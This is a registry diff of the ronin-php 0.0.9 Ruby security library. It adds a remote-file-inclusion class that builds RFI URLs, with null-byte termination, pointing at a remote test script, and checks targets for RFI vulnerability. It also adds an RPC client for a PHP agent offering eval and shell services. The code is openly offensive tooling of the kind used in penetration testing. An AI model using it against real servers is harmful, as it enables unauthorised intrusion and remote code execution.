ronin-php 0.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,127 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/network/http'
25
+ require 'ronin/extensions/uri'
26
+ require 'ronin/formatting/digest'
27
+ require 'ronin/chars'
28
+
29
+ module Ronin
30
+ module PHP
31
+ class RFI
32
+
33
+ # Default URL of the RFI Test script
34
+ TEST_SCRIPT = 'http://ronin.rubyforge.org/dist/php/rfi/test.php'
35
+
36
+ # Prefix text that will appear before the random RFI challenge string
37
+ CHALLENGE_PREFIX = 'PHP RFI Response: '
38
+
39
+ # RFI vulnerable url
40
+ attr_reader :url
41
+
42
+ # RFI vulnerable query parameter
43
+ attr_reader :param
44
+
45
+ # Whether to terminate the RFI script url with a null byte
46
+ attr_accessor :terminate
47
+
48
+ # URL of the RFI Test script
49
+ attr_accessor :test_script
50
+
51
+ #
52
+ # Creates a new RFI object with the specified _url_, _param_ and given
53
+ # _options_.
54
+ #
55
+ # _options may contain the following keys:
56
+ # <tt>:terminate</tt>:: Whether or not to terminate the RFI script url
57
+ # with a null byte. Defaults to +true+.
58
+ # <tt>:test_script</tt>:: URL of RFI test script. Defaults to
59
+ # TEST_SCRIPT.
60
+ #
61
+ def initialize(url,param,options={})
62
+ @url = url
63
+ @param = param
64
+
65
+ if options.has_key?(:terminate)
66
+ @terminate = options[:terminate]
67
+ else
68
+ @terminate = true
69
+ end
70
+
71
+ @test_script = (options[:test_script] || TEST_SCRIPT)
72
+ end
73
+
74
+ #
75
+ # Returns +true+ if the RFI script url will be terminated with
76
+ # a null byte, returns +false+ otherwise.
77
+ #
78
+ def terminate?
79
+ @terminate == true
80
+ end
81
+
82
+ #
83
+ # Builds a RFI url to include the specified _script_url_.
84
+ #
85
+ def url_for(script_url)
86
+ script_url = URI(script_url.to_s)
87
+ new_url = URI(@url.to_s)
88
+
89
+ new_url.query_params.merge!(script_url.query_params)
90
+ script_url.query_params.clear
91
+
92
+ script_url = "#{script_url}?" if terminate?
93
+
94
+ new_url.query_params[@param.to_s] = script_url
95
+ return new_url
96
+ end
97
+
98
+ #
99
+ # Include the specified RFI _script_ using the given _options_.
100
+ #
101
+ def include(script,options={})
102
+ options = options.merge(:url => url_for(script))
103
+
104
+ if options[:method] == :post
105
+ return Net.http_post_body(options)
106
+ else
107
+ return Net.http_get_body(options)
108
+ end
109
+ end
110
+
111
+ #
112
+ # Returns +true+ if the url is vulnerable to RFI, returns +false+
113
+ # otherwise.
114
+ #
115
+ def vulnerable?(options={})
116
+ challenge = Chars.alpha_numeric.random_string(10).md5
117
+
118
+ test_url = URI(@test_script.to_s)
119
+ test_url.query_params['rfi_challenge'] = challenge
120
+
121
+ response = include(test_url,options)
122
+ return response.include?("#{CHALLENGE_PREFIX}#{challenge}")
123
+ end
124
+
125
+ end
126
+ end
127
+ end
@@ -0,0 +1,28 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/php/call'
25
+ require 'ronin/rpc/php/client'
26
+ require 'ronin/rpc/php/console'
27
+ require 'ronin/rpc/php/shell'
28
+ require 'ronin/rpc/php/rfi'
@@ -0,0 +1,45 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/call'
25
+ require 'ronin/formatting/binary'
26
+
27
+ require 'xmlrpc/client'
28
+
29
+ module Ronin
30
+ module RPC
31
+ module PHP
32
+ class Call < RPC::Call
33
+
34
+ #
35
+ # Encodes the call and the given _session_ variables into a base64
36
+ # encoded XMLRPC call message.
37
+ #
38
+ def encode(session={})
39
+ XMLRPC::Create.new.methodCall(@name,session,*(@arguments)).base64_encode
40
+ end
41
+
42
+ end
43
+ end
44
+ end
45
+ end
@@ -0,0 +1,152 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/php/call'
25
+ require 'ronin/rpc/php/response'
26
+ require 'ronin/rpc/php/console'
27
+ require 'ronin/rpc/php/shell'
28
+ require 'ronin/rpc/client'
29
+ require 'ronin/network/http'
30
+
31
+ module Ronin
32
+ module RPC
33
+ module PHP
34
+ class Client < RPC::Client
35
+
36
+ # URL of RPC server
37
+ attr_reader :url
38
+
39
+ # Proxy to send requests through
40
+ attr_accessor :proxy
41
+
42
+ # User-Agent string to send with each request
43
+ attr_accessor :user_agent
44
+
45
+ # Session data
46
+ attr_reader :session
47
+
48
+ # Provides a console service
49
+ service :console, Console
50
+
51
+ # Provides a shell service
52
+ service :shell, Shell
53
+
54
+ #
55
+ # Creates a new Client object with the specified _url_ and the
56
+ # given _options_.
57
+ #
58
+ # _options_ may contain the following keys:
59
+ # <tt>:proxy</tt>:: The proxy settings to use when communicating
60
+ # with the server.
61
+ # <tt>:user_agent</tt>:: The User-Agent to send to the server.
62
+ # <tt>:user_agent_alias</tt>:: The User-Agent alias to send to
63
+ # the server.
64
+ #
65
+ def initialize(url,options={})
66
+ @url = url
67
+
68
+ @proxy = options[:proxy]
69
+
70
+ if options[:user_agent_alias]
71
+ @user_agent = Web.user_agent_alias[options[:user_agent_alias]]
72
+ else
73
+ @user_agent = options[:user_agent]
74
+ end
75
+
76
+ @cookie = nil
77
+ @session = {}
78
+ end
79
+
80
+ def call_url(call_object)
81
+ new_url = URI(@url.to_s)
82
+ new_url.query_params['rpc_call'] = call_object.encode(@session)
83
+
84
+ return new_url
85
+ end
86
+
87
+ #
88
+ # Returns +true+ if the RPC server is running and responding to
89
+ # function calls, returns +false+ otherwise.
90
+ #
91
+ def running?
92
+ call(:running)
93
+ end
94
+
95
+ #
96
+ # Returns a finger-print of the PHP server.
97
+ #
98
+ def fingerprint
99
+ call(:fingerprint)
100
+ end
101
+
102
+ protected
103
+
104
+ #
105
+ # Creates a new Call object for the specified _funtion_ and
106
+ # _arguments_.
107
+ #
108
+ def create_call(function,*arguments)
109
+ Call.new(function,*arguments)
110
+ end
111
+
112
+ #
113
+ # Sends the specified _call_object_ to the RPC server. Returns
114
+ # a new Response object that represents the server's response.
115
+ #
116
+ def send_call(call_object)
117
+ resp = Net.http_get(:url => call_url(call_object),
118
+ :cookie => @cookie,
119
+ :proxy => @proxy,
120
+ :user_agent => @user_agent)
121
+
122
+ new_cookie = resp['Set-Cookie']
123
+ @cookie = new_cookie if new_cookie
124
+
125
+ return Response.new(resp.body)
126
+ end
127
+
128
+ #
129
+ # Returns the return-value of a previous function call encoded
130
+ # into the specified _response_. If the _response_ contains
131
+ # a fault message, the fault exception will be raised.
132
+ #
133
+ def return_value(response)
134
+ status, params = response.decode
135
+
136
+ unless status
137
+ raise(params)
138
+ end
139
+
140
+ @session.merge!(params['session'])
141
+
142
+ if params.has_key?('output')
143
+ print(params['output'])
144
+ end
145
+
146
+ return params['return_value']
147
+ end
148
+
149
+ end
150
+ end
151
+ end
152
+ end
@@ -0,0 +1,42 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/console'
25
+
26
+ module Ronin
27
+ module RPC
28
+ module PHP
29
+ class Console < RPC::Console
30
+
31
+ #
32
+ # Evaluates the specified _string_ of PHP code and returns the
33
+ # result.
34
+ #
35
+ def eval(string)
36
+ call(:eval,string)
37
+ end
38
+
39
+ end
40
+ end
41
+ end
42
+ end
@@ -0,0 +1,63 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/exceptions/response_missing'
25
+ require 'ronin/rpc/response'
26
+
27
+ require 'xmlrpc/client'
28
+
29
+ module Ronin
30
+ module RPC
31
+ module PHP
32
+ class Response < RPC::Response
33
+
34
+ #
35
+ # Returns the default XML parser to use for parsing XMLRPC
36
+ # responses.
37
+ #
38
+ def Response.parser
39
+ @@parser ||= XMLRPC::XMLParser::REXMLStreamParser.new
40
+ end
41
+
42
+ def Response.parser=(new_parser)
43
+ @@parser = new_parser
44
+ end
45
+
46
+ #
47
+ # Decodes the XMLRPC response message embedded in the response
48
+ # from the server.
49
+ #
50
+ def decode
51
+ response = @contents[/<rpc>.*<\/rpc>/m]
52
+
53
+ unless response
54
+ raise(ResponseMissing,"failed to receive a valid RPC method response",caller)
55
+ end
56
+
57
+ return Response.parser.parseMethodResponse(response)
58
+ end
59
+
60
+ end
61
+ end
62
+ end
63
+ end